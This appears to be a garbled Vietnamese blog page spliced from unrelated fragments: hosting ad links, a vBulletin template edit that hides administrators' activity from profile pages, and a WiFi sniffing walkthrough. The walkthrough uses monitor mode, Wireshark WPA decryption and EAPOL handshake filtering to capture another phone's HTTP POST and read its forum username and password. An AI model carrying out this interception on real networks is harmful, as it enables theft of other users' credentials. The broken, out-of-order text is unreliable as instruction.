Site : https://kloud51.com
Link Hosting : https://kloud51.com/cart.php?a=add&pid=5
Link VPS Linux : https://kloud51.com/cart.php?a=confproduct&i=0
Nguồn : IZ - VZ
![[IMG]](http://data.sinhvienit.net/2014/T01/img/SinhVienIT.Net---nh-chup-man-hinh-2014-01-30-143023.png)
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY4f1Jx-GMsyMi6ejniM9zAciWeY6LhDGn6oKpueX2RaC8wT83E8XRV0rqC0sxcUme3p6OnQdtgRADaI3NsLw1xK3F3IG0gWbNeWKD-Kr21iT6ZT1iP9p-460ATJHjsG8l8Ip6ePmm_Vs/s1600/tut1.png)
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF1PRovRUWOASEN1fWkupkw6lTqNZ_5H9ykUEB2thpvjHVVDwUwJGcAVhpIkbZVGIavcE4V6X4jg79TMqNQFgMUHiAtwuN-hDBx0sD28OMojkkq_v-9ZVYTjIx3hsjNaMVlQWmmu8azNA/s1600/tut2.png)
)
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl6gJ1MucFE9OZLXN8zzFoY9AocvKk5nNNPs6TH6rXDbmmnYkVB2UJeDNqbn__wl4MMjvBq8hGTWjAY0mHarc1La0e8u0kXoiGm2Ld15Tx4hc-vGdGMbIW2eOIW3dBDlmyixCX5qyXSGw/s1600/tut4.png)
.
)<!-- current activity -->Sửa bằng cách thêm vào dòng code này trong nó là xong:
<if condition="$prepared['lastactivitydate'] OR $prepared['action']">
<div class="alt2 smallfont block_row" id="activity_info">
<if condition="$prepared['lastactivitydate']">
<div id="last_online">
<span class="shade">$vbphrase[last_activity]:</span> $prepared[lastactivitydate]<if condition="!$show['detailedtime']"> <span class="time">$prepared[lastactivitytime]</span></if>
</div>
</if>
<if condition="$prepared['action']">
<span class="shade">$vbphrase[current_activity]:</span> $prepared[action] $prepared[where]
</if>
</div>
</if>
<!-- / current activity -->
Chú ý: cái đống array(1,2,3,4,5,6,7,8,9) 1,2,3,4,5,6,7,8,9 này là các ID của những User có quyền truy cập vào admincp mà các bạn muốn người khác không xem được cái thông tin trong profile hé.nó sẽ thành như sau:<if condition="!in_array($prepared['userid'], array(1,2,3,4,5,6,7,8,9))">
<!-- current activity -->Save lại và làm tương tự cho các Skin khác nếu có sử dụng. Tóm lại với cách này thì nó sẽ hạn chế được gần như tối đa khả năng tìm kiếm link admincp thật của các bạn trong bước thu thập thông tin của hacker KHI TẤN CÔNG TRỰC TIẾP. Nếu forum các bạn bị dính các lỗi như SQLi và bị local attach thì ... BT
<if condition="!in_array($prepared['userid'], array(1,2,3,4,5,6,7,8,9))">
<if condition="$prepared['lastactivitydate'] OR $prepared['action']">
<div class="alt2 smallfont block_row" id="activity_info">
<if condition="$prepared['lastactivitydate']"><span class="shade">$vbphrase[last_activity]:</span> $prepared[lastactivitydate]<if condition="!$show['detailedtime']"> <span class="time">$prepared[lastactivitytime]</span></if>
</div>
</if>
<if condition="$prepared['action']">
<span class="shade">$vbphrase[current_activity]:</span> $prepared[action] $prepared[where]
</if>
</div>
</if>
</if>
<!-- / current activity -->
http://www.wireshark.org/tools/wpa-psk.htmlTrong đó :
iwlist wlan0 scanningMục đích : tìm thông tin những AP gần với A, chú ý tới channel của AP C( ở đây là channel 10)
iwconfig wlan0 channel 10Chuyển card mạng wifi máy A sang monitor mode, chỉ lắng nghe trên channel 10
service NetworkManager stopTrên cửa sổ wireshark hiện ra vào
iwconfig wlan0 mode monitor
ifconfig wlan0 up
wireshak
Edit-> Preferences->Protocols ->IEEE 802.11Check vào Enable decryption
Capture-> Interfaceschọn wlan0 và bấm start
http://ceh.vn/@4rum/index.phpSign in với user và password của mình ( tôi sử dụng user : mylove14129, pass : abcxyz..)
wlan.addr[0:1]==8c and eapolLọc lấy các gói tin eapol có 2 byte đầu tiên của địa chỉ MAC = 8c ( Ở đây là địa chỉ MAC của mobile B)
http.request.method==POSTChú ý tới dòng
POST /@4rum/member.phpỞ trường :
Line-base text data : username=mylove14129&password=abcxyz....đã thu được user và pasword B dùng để đăng nhập vào ceh
1.http://en.wikipedia.org/wiki/IEEE_802.11i-2004
2. http://www.vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/
3. http://www.vjol.info/index.php/JSTD/article/viewFile/2698/2688
4. http://www.hvaonline.net/hvaonline/posts/list/41009.hva
5. http://wiki.wireshark.org/DisplayFilters
6.http://wiki.wireshark.org/HowToDecrypt802.11
Powered by Blogger | Supported by: W3Schools and Technology Tower